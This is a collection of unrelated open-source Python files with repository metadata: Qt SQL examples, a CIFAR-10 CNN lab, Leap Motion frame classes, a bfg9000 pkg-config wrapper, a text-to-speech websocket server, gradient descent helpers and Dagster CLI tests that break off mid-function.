def itemSolve(self,item):
return item["ID"],item["UrlType"],item["Icon"],item["ItemKind"]["Name"],item["Name"]
if __name__ == "__main__":
Main()
| ShiomiyaRinne/FFXIV-Market-Query | main.py | main.py | py | 3,542 | python | en | code | 1 | github-code | 36 |
28613364026 | from PySide import QtCore, QtGui, QtSql
import connection
def initializeModel(model):
model.setTable("employee")
model.setEditStrategy(QtSql.QSqlTableModel.OnManualSubmit)
model.setRelation(2, QtSql.QSqlRelation('city', 'id', 'name'))
model.setRelation(3, QtSql.QSqlRelation('country', 'id', 'name'))
model.setHeaderData(0, QtCore.Qt.Horizontal, "ID")
model.setHeaderData(1, QtCore.Qt.Horizontal, "Name")
model.setHeaderData(2, QtCore.Qt.Horizontal, "City")
model.setHeaderData(3, QtCore.Qt.Horizontal, "Country")
model.select()
def createView(title, model):
view = QtGui.QTableView()
view.setModel(model)
view.setItemDelegate(QtSql.QSqlRelationalDelegate(view))
view.setWindowTitle(title)
return view
def createRelationalTables():
query = QtSql.QSqlQuery()
query.exec_("create table employee(id int, name varchar(20), city int, country int)")
query.exec_("insert into employee values(1, 'Espen', 5000, 47)")
query.exec_("insert into employee values(2, 'Harald', 80000, 49)")
query.exec_("insert into employee values(3, 'Sam', 100, 41)")
query.exec_("create table city(id int, name varchar(20))")
query.exec_("insert into city values(100, 'San Jose')")
query.exec_("insert into city values(5000, 'Oslo')")
query.exec_("insert into city values(80000, 'Munich')")
query.exec_("create table country(id int, name varchar(20))")
query.exec_("insert into country values(41, 'USA')")
query.exec_("insert into country values(47, 'Norway')")
query.exec_("insert into country values(49, 'Germany')")
if __name__ == '__main__':
import sys
app = QtGui.QApplication(sys.argv)
if not connection.createConnection():
sys.exit(1)
createRelationalTables()
model = QtSql.QSqlRelationalTableModel()
initializeModel(model)
view = createView("Relational Table Model", model)
view.show()
sys.exit(app.exec_())
| pyside/Examples | examples/sql/relationaltablemodel.py | relationaltablemodel.py | py | 1,963 | python | en | code | 357 | github-code | 36 |
30753498437 | from __future__ import absolute_import, division, print_function, unicode_literals
import os
import tensorflow as tf
from tensorflow.keras import datasets, layers, models
import matplotlib.pyplot as plt
CHECKPOINT_PATH = "model/lab2.h5"
def main():
(train_images, train_labels), (test_images,
test_labels) = datasets.cifar10.load_data()
# Normalize pixel values to be between 0 and 1
train_images, test_images = train_images / 255.0, test_images / 255.0
class_names = ['airplane', 'automobile', 'bird', 'cat', 'deer',
'dog', 'frog', 'horse', 'ship', 'truck']
model = models.Sequential()
model.add(layers.Conv2D(
32, (3, 3), activation='relu', input_shape=(32, 32, 3)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.Flatten())
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(10, activation='softmax'))
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
history = model.fit(train_images, train_labels, epochs=10,
validation_data=(test_images, test_labels))
model.save(CHECKPOINT_PATH)
model.evaluate(test_images, test_labels, verbose=2)
plt.plot(history.history['accuracy'], label='accuracy')
plt.plot(history.history['val_accuracy'], label='val_accuracy')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.ylim([0.5, 1])
plt.legend(loc='lower right')
plt.show()
if __name__ == "__main__":
main()
| sontuphan/deep-learning-labs | labs/lab2.py | lab2.py | py | 1,755 | python | en | code | 0 | github-code | 36 |
34316494896 | '''
Created on Mar 6, 2014
@author: kerem
'''
from random import randint
from random import random as rnd
class InteractionBox(object):
center = None
width = None
height = None
depth = None
is_valid = None
def __init__(self):
pass
def set(self, box):
self.center = box.center.to_tuple()
self.width = box.width
self.height = box.height
self.depth = box.depth
self.is_valid = box.is_valid
return self
class LeapHand(object):
id = None
frame = None
palm_position = None
stabilized_palm_position = None
palm_velocity = None
palm_normal = None
direction = None
sphere_center = None
sphere_radius = None
time_visible = None
is_valid = None
_translation = None
_translation_prob = None
def __init__(self, hand, frame, random=False, position=None):
if random:
self.id = 1
self.frame = None
if position:
assert len(position) == 3
self.stabilized_palm_position = position
else:
self.stabilized_palm_position = (rnd() * 100, rnd() * 100, rnd() * 100)
self.palm_normal = (rnd() * 100, rnd() * 100, rnd() * 100)
self.palm_position = (rnd() * 100, rnd() * 100, rnd() * 100)
self.palm_velocity = (rnd() * 100, rnd() * 100, rnd() * 100)
self.direction = (rnd() * 100, rnd() * 100, rnd() * 100)
self.sphere_center = (rnd() * 100, rnd() * 100, rnd() * 100)
self.time_visible = randint(1, 100)
self.is_valid = True
else:
self.id = hand.id
self.frame = frame
self.stabilized_palm_position = hand.stabilized_palm_position.to_tuple()
self.palm_normal = hand.palm_normal.to_tuple()
self.palm_position = hand.palm_position.to_tuple()
self.palm_velocity = hand.palm_velocity.to_tuple()
self.direction = hand.direction.to_tuple()
self.sphere_center = hand.sphere_center.to_tuple()
self.time_visible = hand.time_visible
self.is_valid = hand.is_valid
class LeapFrame(object):
'''
This is a pure python clone of the Leap Motion Controller
frame objects. It is written to be picklable, unlike the
original, SWIG-generated frame objects. It does not include
anything finer-grained than hand movements i.e. no pointables,
fingers or tools.
'''
id = None
timestamp = None
hands = None
interaction_box = None
current_frames_per_second = None
is_valid = None
def __init__(self, frame, random=False, position=None):
'''
Constructs a new python frame from the original frame
'''
if random:
self.id = randint(0,100)
self.timestamp = randint(0,10000)
self.hands = [LeapHand(None, None, random=random, position=position)]
self.interaction_box = InteractionBox()
self.interaction_box.center = (randint(0,100),randint(0,100),randint(0,100))
self.interaction_box.width = randint(0,100)
self.interaction_box.height = randint(0,100)
self.interaction_box.depth = randint(0,100)
self.current_frames_per_second = randint(0,100)
self.is_valid = True
else:
self.id = frame.id
self.timestamp = frame.timestamp
self.hands = [LeapHand(hand, self) for hand in frame.hands]
self.interaction_box = InteractionBox().set(frame.interaction_box)
self.current_frames_per_second = frame.current_frames_per_second
self.is_valid = frame.is_valid
def get_stabilized_position(self):
"""
Shortcut to getting the stabilized position of
the first available hand.
"""
return self.hands[0].stabilized_palm_position
def hand(self, id):
"""
The Hand object with the specified ID in this frame.
"""
pass
def gestures(self, sinceFrame):
"""
Returns a GestureList containing all gestures that have
occured since the specified frame.
"""
pass
def toJSON(self):
import jsonpickle
return jsonpickle.encode(self)
def __str__(self):
return "LeapFrame({:.2f},{:.2f},{:.2f})".format(*self.get_stabilized_position())
def __repr__(self):
return str(self)
def generateRandomSignal(duration):
"""
Returns a randomly generated list of LeapFrame objects
for testing purposes.
"""
from jsonpickle import encode
lst = []
for i in range(duration):
frame = LeapFrame(None, random=True, position=(40 + i, 30, 30))
lst.append(encode(frame))
return lst
| keryil/leaparticulatorqt | leaparticulator/data/frame.py | frame.py | py | 4,847 | python | en | code | 0 | github-code | 36 |
24390093684 | import argparse
import os
import re
import subprocess
from . import tool
from .common import check_which, Command, guess_command, make_command_converter
from .. import log, options as opts, shell
from ..exceptions import PackageResolutionError, PackageVersionError
from ..file_types import Directory, HeaderDirectory
from ..iterutils import iterate, listify
from ..objutils import memoize_method
from ..packages import Package, PackageKind
from ..path import Path, Root
from ..shell import posix as pshell, which
from ..versioning import check_version, SpecifierSet, Version
_lib_dirs_parser = argparse.ArgumentParser()
_lib_dirs_parser.add_argument('-L', action='append', dest='lib_dirs')
_include_dirs_parser = argparse.ArgumentParser()
_include_dirs_parser.add_argument('-I', action='append', dest='include_dirs')
_c_to_pkgconf = make_command_converter([
(re.compile(r'gcc(?:-[\d.]+)?(?:-(?:posix|win32))?'), 'pkg-config'),
])
def _shell_split(output):
return pshell.split(output, type=opts.option_list, escapes=True)
def _requires_split(output):
return [i.split(' ')[0] for i in output.split('\n') if i]
@tool('pkg_config')
class PkgConfig(Command):
# Map command names to pkg-config flags and whether they should be treated
# as shell arguments.
_options = {
'version': (['--modversion'], None),
'requires': (['--print-requires'], _requires_split),
'path': (['--variable=pcfiledir'], None),
'install_names': (['--variable=install_names'], _shell_split),
'include_dirs': (['--cflags-only-I'], _shell_split),
'other_cflags': (['--cflags-only-other'], _shell_split),
'lib_dirs': (['--libs-only-L'], _shell_split),
'other_ldflags': (['--libs-only-other'], _shell_split),
'ldlibs': (['--libs-only-l'], _shell_split),
}
@staticmethod
def _get_command(env):
cmd = env.getvar('PKG_CONFIG')
if cmd:
return check_which(cmd, env.variables)
# We don't have an explicitly-set command from the environment, so try
# to guess what the right command would be based on the C compiler
# command.
default = ['pkg-config', 'pkgconf']
sibling = env.builder('c').compiler
guessed_cmd = guess_command(sibling, _c_to_pkgconf)
# If the guessed command is the same as the default command candidate,
# skip it. This will keep us from logging a useless info message that
# we guessed the default value for the command.
if guessed_cmd is not None and guessed_cmd != default:
try:
cmd = which(guessed_cmd, env.variables)
log.info('guessed pkg-config {!r} from c compiler {!r}'
.format(guessed_cmd, shell.join(sibling.command)))
return cmd, True
except FileNotFoundError:
pass
# Try the default command candidate.
return check_which(default, env.variables)
def __init__(self, env):
super().__init__(env, command=('pkg_config',) + self._get_command(env))
def _call(self, cmd, names, type, static=False, msvc_syntax=False,
options=[]):
result = cmd + listify(names) + self._options[type][0] + options
if static:
result.append('--static')
if msvc_syntax:
result.append('--msvc-syntax')
return result
def run(self, names, type, *args, extra_env=None, installed=None,
**kwargs):
if installed is True:
extra_env = dict(PKG_CONFIG_DISABLE_UNINSTALLED='1',
**(extra_env or {}))
elif installed is False:
names = [i + '-uninstalled' for i in iterate(names)]
result = super().run(names, type, *args, extra_env=extra_env,
**kwargs).strip()
if self._options[type][1]:
return self._options[type][1](result)
return result
def search_path(self, extra=[]):
path = self.env.variables.get('PKG_CONFIG_PATH')
if path:
return shell.join_paths(extra + [path])
return shell.join_paths(extra)
class PkgConfigPackage(Package):
def __init__(self, pkg_config, name, submodules=None,
specifier=SpecifierSet(), pcnames=None, *, format,
kind=PackageKind.any, system=True, deps=None,
search_path=None):
super().__init__(name, submodules, format=format, deps=deps)
self._pkg_config = pkg_config
self._env = ({'PKG_CONFIG_PATH': pkg_config.search_path(search_path)}
if search_path else {})
self.pcnames = pcnames if pcnames is not None else [name]
try:
version = self._call(self.pcnames[0], 'version')
version = Version(version) if version else None
except subprocess.CalledProcessError:
raise PackageResolutionError("unable to find package '{}'"
.format(name))
if version:
check_version(version, specifier, name, PackageVersionError)
self.version = version
self.specifier = specifier
self.static = kind == PackageKind.static
self.system = system
@memoize_method
def _call(self, *args, extra_env=None, **kwargs):
final_env = dict(**self._env, **extra_env) if extra_env else self._env
return self._pkg_config.run(*args, extra_env=final_env, **kwargs)
def include_dirs(self, **kwargs):
args = self._call(self.pcnames, 'include_dirs', self.static, **kwargs)
inc_dirs = _include_dirs_parser.parse_known_args(args)[0].include_dirs
return [Path(i, Root.absolute) for i in inc_dirs or []]
def lib_dirs(self, **kwargs):
args = self._call(self.pcnames, 'lib_dirs', self.static, **kwargs)
lib_dirs = _lib_dirs_parser.parse_known_args(args)[0].lib_dirs
return [Path(i, Root.absolute) for i in lib_dirs or []]
def _get_rpaths(self):
extra_env = {'PKG_CONFIG_ALLOW_SYSTEM_LIBS': '1'}
def rpaths_for(installed):
try:
return self.lib_dirs(extra_env=extra_env, installed=installed)
except shell.CalledProcessError:
return None
uninstalled = rpaths_for(installed=False)
installed = rpaths_for(installed=True)
if uninstalled is None or uninstalled == installed:
return opts.option_list(opts.rpath_dir(i) for i in installed)
else:
return opts.option_list(
(opts.rpath_dir(i, 'uninstalled') for i in uninstalled),
(opts.rpath_dir(i, 'installed') for i in installed or []),
)
def _get_install_name_changes(self, pcnames=None):
if pcnames is None:
pcnames = self.pcnames
def install_names_for(installed):
try:
return self._call(pcnames, 'install_names', self.static,
installed=installed)
except shell.CalledProcessError:
return None
uninstalled = install_names_for(installed=False)
installed = install_names_for(installed=True)
if ( uninstalled is None or installed is None or
uninstalled == installed ):
result = opts.option_list()
else:
result = opts.option_list(opts.install_name_change(i, j)
for i, j in zip(uninstalled, installed))
# Recursively get install_name changes for public requirements.
requires = self._call(pcnames, 'requires')
for i in requires:
result.extend(self._get_install_name_changes(i))
return result
def compile_options(self, compiler, *, raw=False):
flags = self._call(self.pcnames, 'other_cflags', self.static,
not raw and compiler.flavor == 'msvc')
# Get include paths separately so we can selectively use them as
# "system" includes; this helps ensure that warnings in external
# headers don't break the build when using `-Werror`.
incdirs = opts.option_list(
opts.include_dir(HeaderDirectory(i, system=self.system))
for i in self.include_dirs()
)
return flags + incdirs
def link_options(self, linker, *, raw=False):
flags = self._call(self.pcnames, 'other_ldflags', self.static,
not raw and linker.flavor == 'msvc')
libdirs = opts.option_list(opts.lib_dir(Directory(i))
for i in self.lib_dirs())
# XXX: How should we ensure that these libs are linked statically when
# necessary?
libs = self._call(self.pcnames, 'ldlibs', self.static,
not raw and linker.flavor == 'msvc')
libs = opts.option_list(opts.lib_literal(i) for i in libs)
# Add extra link options as needed for platform-specific oddities.
extra_opts = opts.option_list()
if not raw and not self.static:
if linker.builder.object_format == 'elf':
# pkg-config packages don't generally include rpath
# information, so we need to generate it ourselves.
extra_opts = self._get_rpaths()
elif linker.builder.object_format == 'mach-o':
# When using uninstalled variants of pkg-config packages, we
# should check if there are any install_names set that we need
# to update when installing. For more information, see the
# pkg-config builtin.
extra_opts = self._get_install_name_changes()
return flags + libdirs + libs + extra_opts
def path(self):
return self._call(self.pcnames[0], 'path')
def __repr__(self):
return '<{}({!r}, {!r})>'.format(
type(self).__name__, self.name, str(self.version)
)
# A package automatically generated for us by mopack. This is useful when
# generating our own pkg-config file, so that we don't add this one as a
# requirement (it's only temporary, after all).
class GeneratedPkgConfigPackage(PkgConfigPackage):
pass
def resolve(env, name, *args, generated=False, **kwargs):
type = GeneratedPkgConfigPackage if generated else PkgConfigPackage
pkg = type(env.tool('pkg_config'), name, *args, **kwargs)
log.info('found package {!r} version {} via pkg-config in {}'
.format(pkg.name, pkg.version, os.path.normpath(pkg.path())))
return pkg
| jimporter/bfg9000 | bfg9000/tools/pkg_config.py | pkg_config.py | py | 10,628 | python | en | code | 73 | github-code | 36 |
71023850983 | from vues.vue_joueurs import VueJoueur
from models.joueur import Joueur
import utilitaires.menu as menu
class ControllerJoueur:
def __init__(self, db_table_joueur, requete):
self.table = db_table_joueur
self.user = requete
def creer_joueur(self):
""" Cree un joueur et l'ajoute a la db 'table_joueur' """
joueur = Joueur(VueJoueur.creer_nom_joueur(),
VueJoueur.creer_prenom_joueur(),
VueJoueur.creer_date_naissance_joueur(),
VueJoueur.creer_sexe_joueur(),
VueJoueur.creer_classement_joueur(),
self.table, self.user)
id_joueur = joueur.sauvegarder_joueur_dans_db()
joueur.id = id_joueur
joueur.sauvegarder_joueur_dans_db()
return joueur
def ajouter_joueur(self, nombre_joueurs):
""" Cree un nouveau joueur ou recupere dans la base de donnees. Retourne la listes des joueurs ajoutés"""
liste_joueurs = []
while True:
for i in range(nombre_joueurs):
choix = {1: "Creer nouveau joueur", 2: "Choisir joueur dans la base de donnee"}
try:
choix_utilisateur = VueJoueur.choisir_ajouter_joueur()
if choix_utilisateur in choix:
if choix_utilisateur == 1:
joueur = self.creer_joueur()
for id in joueur.id:
joueur.id = id
liste_joueurs.append(joueur)
i += 1
elif choix_utilisateur == 2:
choix = VueJoueur.choisir_par_id(self.table)
joueur_recuperer = self.recuperer_joueur_db(choix)
joueur = Joueur.deserialiser_joueur(joueur_recuperer)
joueur.id = choix
liste_joueurs.append(joueur)
i += 1
else:
VueJoueur.afficher_message_erreur()
else:
VueJoueur.afficher_message_erreur()
except ValueError:
VueJoueur.afficher_message_erreur()
return liste_joueurs
def recuperer_joueur_db(self, choix):
""" Recupere le joueur dans la base de donnees par son 'id' """
id = self.table.get(doc_id=choix)
if id != []:
return id
else:
VueJoueur.afficher_message_erreur()
def modifier_classement_joueur(self) -> str:
""" L'utilisateur peut modifier le classement d'un joueur par son ID"""
while True:
try:
joueur_a_modifier = VueJoueur.modifier_classement(self.table)
joueur_trouve = self.table.get(doc_id=joueur_a_modifier)
if joueur_trouve is not None:
nouveau_classement = VueJoueur.entrer_nouveau_classement()
self.table.update({"classement": nouveau_classement}, doc_ids=[joueur_a_modifier])
return joueur_trouve
else:
VueJoueur.afficher_message_erreur()
except ValueError:
VueJoueur.afficher_message_erreur()
def gerer_joueurs(self):
""" Gére la gestion des joueurs dans le menu principal"""
while True:
menu_joueur = menu.Menu("Menu joueur", menu.option_joueur)
choix_joueur = menu_joueur.afficher()
if choix_joueur == "1":
self.creer_joueur()
elif choix_joueur == "2":
self.modifier_classement_joueur()
elif choix_joueur == "3":
print("Retour en arriere")
break
else:
print("Choix invalide !")
def main():
pass
if __name__ == "__main__":
main()
| pnt983/P_4_OpenClassRooms | controllers/controller_joueurs.py | controller_joueurs.py | py | 3,987 | python | fr | code | 0 | github-code | 36 |
571623190 | from pymed import PubMed
"""In MEDLINE/PubMed, every journal article is indexed with about 10–15 subject headings,
subheadings and supplementary concept records, with some of them designated as major and marked
with an asterisk, indicating the article's major topics. When performing a MEDLINE search via PubMed,
entry terms are automatically translated into (i.e. mapped to) the corresponding descriptors with a
good degree of reliability; it is recommended to check the 'Details tab' in PubMed to see how a search
formulation was translated. By default, a search for a descriptor will include all the descriptors in
the hierarchy below the given one. PubMed does not apply automatic mapping of the term in the following
circumstances: by writing the quoted phrase (e.g., "kidney allograft"), when truncated on the asterisk
(e.g., kidney allograft *), and when looking with field labels (e.g., Cancer [ti]).
Campos-Asensio, C. (2018). "Cómo elaborar una estrategia de búsqueda bibliográfica".
Enfermería Intensiva (in Spanish). 29 (4): 182–186. """
pubmed = PubMed(tool="MyTool", email="my@email.address")
results = pubmed.query("spanish[Language]" , max_results=500)
for res in results:
print(res) | MarTnquesada/tfg | tfg/evaluation/pubmed_queries.py | pubmed_queries.py | py | 1,223 | python | en | code | 0 | github-code | 36 |
9262633989 | from tts_websocketserver.tts_pipeline import get_pipeline
from rgws.interface import WebsocketServer
import json, asyncio
class TTSPipelineManager:
def __init__(self):
self.state = "Setup"
self.pipeline = get_pipeline()
self.pipeline.build()
self.state = "Ready"
async def process_text(self, text):
self.state = "Processing"
yield {"resp": self.pipeline.predict(text)}
self.state = "Processed"
async def status(self):
return self.state
def __del__(self):
self.state = "Disposing"
self.pipeline.dispose()
self.state = "Disposed"
# building in global so it can also be imported from outside
# eg. from tts_websocketserver.tts_server import tts_pipeline
tts_pipeline = TTSPipelineManager()
class TTSServerInterface(WebsocketServer):
def __init__(self, **kwargs):
super(TTSServerInterface, self).__init__(**kwargs)
self._register(tts_pipeline.process_text)
self._register(self.status)
self._register(self.setup_model)
async def _consumer(self, ws, message):
ret = await self.dispatch(message)
async for gen in ret:
await ws.send_json(gen)
async def status(self):
yield {"resp": tts_pipeline.state}
async def setup_model(self):
yield {"resp": True if tts_pipeline.state != "Setup" else False}
def run():
s = TTSServerInterface(host="localhost", port=8787)
loop = asyncio.get_event_loop()
loop.run_until_complete(s.run())
loop.run_forever()
if __name__ == "__main__":
run() | TheSoundOfAIOSR/rg_text_to_sound | tts_websocketserver/src/tts_websocketserver/tts_server.py | tts_server.py | py | 1,659 | python | en | code | 4 | github-code | 36 |
1495371874 | import numpy as np
def compute_cost(X, y, theta):
m = y.size
h = np.dot(X, theta)
return 1 / (2 * m) * ((h - y) ** 2).sum()
def gradient_descent(X, y, theta, alpha, iterations):
m = y.size
for i in range(iterations):
h = np.dot(X, theta)
error = h - y
theta -= (alpha / m) * np.dot(X.T, error)
return theta
def feature_normalize(X):
mu = np.mean(X, axis=0)
sigma = np.std(X, axis=0)
normX = (X - mu) / sigma
return (normX, mu, sigma)
def gradient_descent_multi(X, y, theta, alpha, num_iters):
m = y.size
j_history = np.zeros(num_iters + 1)
j0 = compute_cost(X, y, theta)
for i in range(num_iters):
h = np.dot(X, theta)
error = h - y
theta -= (alpha / m) * np.dot(X.T, error)
j_history[i] = compute_cost(X, y, theta)
np.insert(j_history, 0, j0)
return (theta, j_history)
def normal_eqn(X, y):
return np.dot(np.dot(np.linalg.inv(np.dot(X.T, X)), X.T), y)
| takehilo/coursera-machine-learning-python | ex1/functions.py | functions.py | py | 993 | python | en | code | 1 | github-code | 36 |
495434407 | from __future__ import print_function
import os
import string
import mock
import pytest
from click import UsageError
from click.testing import CliRunner
from dagster import (
DagsterInvariantViolationError,
PartitionSetDefinition,
RepositoryDefinition,
ScheduleDefinition,
lambda_solid,
pipeline,
repository_partitions,
schedules,
seven,
solid,
)
from dagster.check import CheckError
from dagster.cli.pipeline import (
execute_backfill_command,
execute_execute_command,
execute_list_command,
execute_print_command,
execute_scaffold_command,
pipeline_backfill_command,
pipeline_execute_command,
pipeline_list_command,
pipeline_print_command,
pipeline_scaffold_command,
)
from dagster.cli.run import run_list_command, run_wipe_command
from dagster.cli.schedule import (
schedule_list_command,
schedule_restart_command,
schedule_start_command,
schedule_stop_command,
schedule_up_command,
schedule_wipe_command,
)
from dagster.config.field_utils import Shape
from dagster.core.instance import DagsterInstance, InstanceType
from dagster.core.launcher import RunLauncher
from dagster.core.serdes import ConfigurableClass
from dagster.core.storage.event_log import InMemoryEventLogStorage
from dagster.core.storage.local_compute_log_manager import NoOpComputeLogManager
from dagster.core.storage.root import LocalArtifactStorage
from dagster.core.storage.runs import InMemoryRunStorage
from dagster.utils import script_relative_path
from dagster.utils.test import FilesytemTestScheduler
def no_print(_):
return None
@lambda_solid
def do_something():
return 1
@lambda_solid
def do_input(x):
return x
@pipeline(name='foo')
def foo_pipeline():
do_something()
def define_foo_pipeline():
return foo_pipeline
@pipeline(name='baz', description='Not much tbh')
def baz_pipeline():
do_input()
def define_bar_repo():
return RepositoryDefinition('bar', {'foo': define_foo_pipeline, 'baz': lambda: baz_pipeline},)
@solid
def spew(context):
context.log.info('HELLO WORLD')
@solid
def fail(context):
raise Exception('I AM SUPPOSED TO FAIL')
@pipeline
def stdout_pipeline():
spew()
@pipeline
def stderr_pipeline():
fail()
def test_list_command():
runner = CliRunner()
execute_list_command(
{
'repository_yaml': None,
'python_file': script_relative_path('test_cli_commands.py'),
'module_name': None,
'fn_name': 'define_bar_repo',
},
no_print,
)
result = runner.invoke(
pipeline_list_command,
['-f', script_relative_path('test_cli_commands.py'), '-n', 'define_bar_repo'],
)
assert result.exit_code == 0
assert result.output == (
'Repository bar\n'
'**************\n'
'Pipeline: baz\n'
'Description:\n'
'Not much tbh\n'
'Solids: (Execution Order)\n'
' do_input\n'
'*************\n'
'Pipeline: foo\n'
'Solids: (Execution Order)\n'
' do_something\n'
)
execute_list_command(
{
'repository_yaml': None,
'python_file': None,
'module_name': 'dagster_examples.intro_tutorial.repos',
'fn_name': 'define_repo',
},
no_print,
)
result = runner.invoke(
pipeline_list_command, ['-m', 'dagster_examples.intro_tutorial.repos', '-n', 'define_repo']
)
assert result.exit_code == 0
assert result.output == (
'Repository hello_cereal_repository\n'
'**********************************\n'
'Pipeline: complex_pipeline\n'
'Solids: (Execution Order)\n'
' load_cereals\n'
' sort_by_calories\n'
' sort_by_protein\n'
' display_results\n'
'*******************************\n'
'Pipeline: hello_cereal_pipeline\n'
'Solids: (Execution Order)\n'
' hello_cereal\n'
)
execute_list_command(
{
'repository_yaml': script_relative_path('repository_module.yaml'),
'python_file': None,
'module_name': None,
'fn_name': None,
},
no_print,
)
result = runner.invoke(
pipeline_list_command, ['-y', script_relative_path('repository_module.yaml')]
)
assert result.exit_code == 0
assert result.output == (
'Repository hello_cereal_repository\n'
'**********************************\n'
'Pipeline: complex_pipeline\n'
'Solids: (Execution Order)\n'
' load_cereals\n'
' sort_by_calories\n'
' sort_by_protein\n'
' display_results\n'
'*******************************\n'
'Pipeline: hello_cereal_pipeline\n'
'Solids: (Execution Order)\n'
' hello_cereal\n'
)
with pytest.raises(UsageError):
execute_list_command(
{
'repository_yaml': None,
'python_file': 'foo.py',
'module_name': 'dagster_examples.intro_tutorial.repos',
'fn_name': 'define_repo',
},
no_print,
)
result = runner.invoke(
pipeline_list_command,
['-f', 'foo.py', '-m', 'dagster_examples.intro_tutorial.repos', '-n', 'define_repo'],
)
assert result.exit_code == 2
with pytest.raises(UsageError):
execute_list_command(
{
'repository_yaml': None,
'python_file': None,
'module_name': 'dagster_examples.intro_tutorial.repos',
'fn_name': None,
},
no_print,
)
result = runner.invoke(pipeline_list_command, ['-m', 'dagster_examples.intro_tutorial.repos'])
assert result.exit_code == 2
with pytest.raises(UsageError):
execute_list_command(
{
'repository_yaml': None,
'python_file': script_relative_path('test_cli_commands.py'),
'module_name': None,
'fn_name': None,
},
no_print,
)
result = runner.invoke(
pipeline_list_command, ['-f', script_relative_path('test_cli_commands.py')]
)
assert result.exit_code == 2
def valid_execute_args():
return [
{
'repository_yaml': script_relative_path('repository_file.yaml'),
'pipeline_name': ('foo',),
'python_file': None,
'module_name': None,
'fn_name': None,
},
{
'repository_yaml': script_relative_path('repository_module.yaml'),
'pipeline_name': ('hello_cereal_pipeline',),
'python_file': None,
'module_name': None,
'fn_name': None,
},
{
'repository_yaml': None,
'pipeline_name': ('foo',),
'python_file': script_relative_path('test_cli_commands.py'),
'module_name': None,
'fn_name': 'define_bar_repo',
},
{
'repository_yaml': None,
'pipeline_name': ('hello_cereal_pipeline',),
'python_file': None,
'module_name': 'dagster_examples.intro_tutorial.repos',
'fn_name': 'define_repo',
},
{
'repository_yaml': None,
'pipeline_name': (),
'python_file': None,
'module_name': 'dagster_examples.intro_tutorial.repos',
'fn_name': 'hello_cereal_pipeline',
},
{
'repository_yaml': None,
'pipeline_name': (),
'python_file': script_relative_path('test_cli_commands.py'),
'module_name': None,
'fn_name': 'define_foo_pipeline',
},
{
'repository_yaml': None,
'pipeline_name': (),
'python_file': script_relative_path('test_cli_commands.py'),
'module_name': None,
'fn_name': 'foo_pipeline',
},
]
def valid_cli_args():
return [
['-y', script_relative_path('repository_file.yaml'), 'foo'],
['-y', script_relative_path('repository_module.yaml'), 'hello_cereal_pipeline'],
['-f', script_relative_path('test_cli_commands.py'), '-n', 'define_bar_repo', 'foo'],
[
'-m',
'dagster_examples.intro_tutorial.repos',
'-n',
'define_repo',
'hello_cereal_pipeline',
],
['-m', 'dagster_examples.intro_tutorial.repos', '-n', 'hello_cereal_pipeline'],
['-f', script_relative_path('test_cli_commands.py'), '-n', 'define_foo_pipeline'],
]
def test_print_command():
for cli_args in valid_execute_args():
execute_print_command(verbose=True, cli_args=cli_args, print_fn=no_print)
for cli_args in valid_execute_args():
execute_print_command(verbose=False, cli_args=cli_args, print_fn=no_print)
runner = CliRunner()
for cli_args in valid_cli_args():
result = runner.invoke(pipeline_print_command, cli_args)
assert result.exit_code == 0
result = runner.invoke(pipeline_print_command, ['--verbose'] + cli_args)
assert result.exit_code == 0
res = runner.invoke(
pipeline_print_command,
[
'--verbose',
'-f',
script_relative_path('test_cli_commands.py'),
'-n',
'define_bar_repo',
'baz',
],
)
assert res.exit_code == 0
def test_execute_mode_command():
runner = CliRunner()
add_result = runner_pipeline_execute(
runner,
[
'-y',
script_relative_path('../repository.yaml'),
'--env',
script_relative_path('../environments/multi_mode_with_resources/add_mode.yaml'),
'-d',
'add_mode',
'multi_mode_with_resources', # pipeline name
],
)
assert add_result
mult_result = runner_pipeline_execute(
runner,
[
'-y',
script_relative_path('../repository.yaml'),
'--env',
script_relative_path('../environments/multi_mode_with_resources/mult_mode.yaml'),
'-d',
'mult_mode',
'multi_mode_with_resources', # pipeline name
],
)
assert mult_result
double_adder_result = runner_pipeline_execute(
runner,
[
'-y',
script_relative_path('../repository.yaml'),
'--env',
script_relative_path(
'../environments/multi_mode_with_resources/double_adder_mode.yaml'
),
'-d',
'double_adder_mode',
'multi_mode_with_resources', # pipeline name
],
)
assert double_adder_result
def test_execute_preset_command():
runner = CliRunner()
add_result = runner_pipeline_execute(
runner,
[
'-y',
script_relative_path('../repository.yaml'),
'-p',
'add',
'multi_mode_with_resources', # pipeline name
],
)
assert 'PIPELINE_SUCCESS' in add_result.output
# Can't use -p with --env
bad_res = runner.invoke(
pipeline_execute_command,
[
'-y',
script_relative_path('../repository.yaml'),
'-p',
'add',
'--env',
script_relative_path(
'../environments/multi_mode_with_resources/double_adder_mode.yaml'
),
'multi_mode_with_resources', # pipeline name
],
)
assert bad_res.exit_code == 2
def test_execute_command():
for cli_args in valid_execute_args():
execute_execute_command(env=None, cli_args=cli_args)
for cli_args in valid_execute_args():
execute_execute_command(
env=[script_relative_path('default_log_error_env.yaml')], cli_args=cli_args
)
runner = CliRunner()
for cli_args in valid_cli_args():
runner_pipeline_execute(runner, cli_args)
runner_pipeline_execute(
runner, ['--env', script_relative_path('default_log_error_env.yaml')] + cli_args
)
res = runner.invoke(
pipeline_execute_command,
['-y', script_relative_path('repository_module.yaml'), 'hello_cereal_pipeline', 'foo'],
)
assert res.exit_code == 1
assert isinstance(res.exception, CheckError)
assert 'Can only handle zero or one pipeline args.' in str(res.exception)
def test_stdout_execute_command():
runner = CliRunner()
result = runner_pipeline_execute(
runner, ['-f', script_relative_path('test_cli_commands.py'), '-n', 'stdout_pipeline']
)
assert 'HELLO WORLD' in result.output
def test_stderr_execute_command():
runner = CliRunner()
result = runner_pipeline_execute(
runner, ['-f', script_relative_path('test_cli_commands.py'), '-n', 'stderr_pipeline']
)
assert 'I AM SUPPOSED TO FAIL' in result.output
def test_fn_not_found_execute():
with pytest.raises(DagsterInvariantViolationError) as exc_info:
execute_execute_command(
env=None,
cli_args={
'repository_yaml': None,
'pipeline_name': (),
'python_file': script_relative_path('test_cli_commands.py'),
'module_name': None,
'fn_name': 'nope',
},
)
assert 'nope not found in module' in str(exc_info.value)
def not_a_repo_or_pipeline_fn():
return 'kdjfkjdf'
not_a_repo_or_pipeline = 123
def test_fn_is_wrong_thing():
